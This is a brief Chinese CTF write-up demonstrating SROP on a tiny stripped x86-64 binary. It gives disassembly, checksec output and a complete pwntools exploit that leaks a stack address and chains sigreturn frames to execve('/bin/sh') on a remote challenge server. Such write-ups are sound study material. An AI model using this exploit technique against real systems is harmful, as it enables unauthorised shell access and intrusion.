SROP的一个实例

以前一直只是大概看过这种技术,没实践过,今天刚好遇到一道题,实践了一波,确实很方便

unmoxiao@cat ~/s/pd_ubuntu> r2 -A smallest                                                                             00:54:15
Warning: Cannot initialize dynamic strings
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze len bytes of instructions for references (aar)
[x] Analyze function calls (aac)
[ ] [*] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan))
0x004000b0

 -- WASTED
[0x004000b0]> afl
0x004000b0    1 17           entry0
[0x004000b0]> pdf entry0
            ;-- section..text:
/ (fcn) entry0 17
|   entry0 ();
|           0x004000b0      4831c0         xor rax, rax                ; section 1 va=0x004000b0 pa=0x000000b0 sz=17 vsz=17 rwx=--r-x .text
|           0x004000b3      ba00040000     mov edx, 0x400              ; 1024
|           0x004000b8      4889e6         mov rsi, rsp
|           0x004000bb      4889c7         mov rdi, rax
|           0x004000be      0f05           syscall
\           0x004000c0      c3             ret
[0x004000b0]>

 

 

源码就这么几行,

junmoxiao@cat ~/s/pd_ubuntu> file smallest                                                                              00:54:06
smallest: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
junmoxiao@cat ~/s/pd_ubuntu> checksec smallest                                                                          00:54:12
[*] '/Users/junmoxiao/share/pd_ubuntu/smallest'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
junmoxiao@cat ~/s/pd_ubuntu>

 

最后的exp

#coding:utf-8
from pwn import *
import time

file_name = './smallest'
context.binary = file_name
elf = ELF(file_name)
#context.log_level = 'debug'

syscall_addr = 0x4000be

#p = process(file_name)
p = remote('106.75.93.227', 20000)
#p = remote('106.75.61.55',  20000)
#gdb.attach(p, 'aslr on;b * 0x4000b0')

# ---------------------------------------------------------------------------------
log.info('call read; call write; call read')

payload = p64(0x4000b0)
payload += p64(0x4000b3)
payload += p64(0x4000b0)


p.sendline(payload)

time.sleep(3)
p.send('\xb3')

# -------------------------------------------------------------------------------------
# set eax; sigreturn; 
leak_data = p.recvn(0x400)

leak_addr = u64(leak_data[0x8:0x8+8])
print "leak_addr: %s" % hex(leak_addr)


stack_addr = leak_addr - 0x1000
print 'stack_start_addr %s' % hex(stack_addr)

binsh_addr = stack_addr + 0x300
print 'binsh_addr: %s' % hex(binsh_addr)
log.info('stack pivot to %s' % hex(stack_addr))

frame = SigreturnFrame()
frame.rax = constants.SYS_read
frame.rdi = 0
frame.rsi = stack_addr
frame.rdx = 0x500
frame.rsp = stack_addr
frame.rip = syscall_addr

payload =  p64(0x4000b0) + p64(syscall_addr)
payload += str(frame)
p.sendline(payload)

time.sleep(10)
p.send(payload[8:8+15]) # set eax=sigreturn

time.sleep(5)
log.info('execve')
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = binsh_addr
frame.rsi = 0
frame.rdx = 0
frame.rsp = 0x400300
frame.rip = syscall_addr
payload =  p64(0x4000b0) + p64(syscall_addr)
payload += str(frame)
payload += 'a' * (0x300-len(payload)) + '/bin/sh\x00'

p.sendline(payload)
time.sleep(5)
p.send(payload[8:8+15]) # set eax=sigreturn


p.interactive()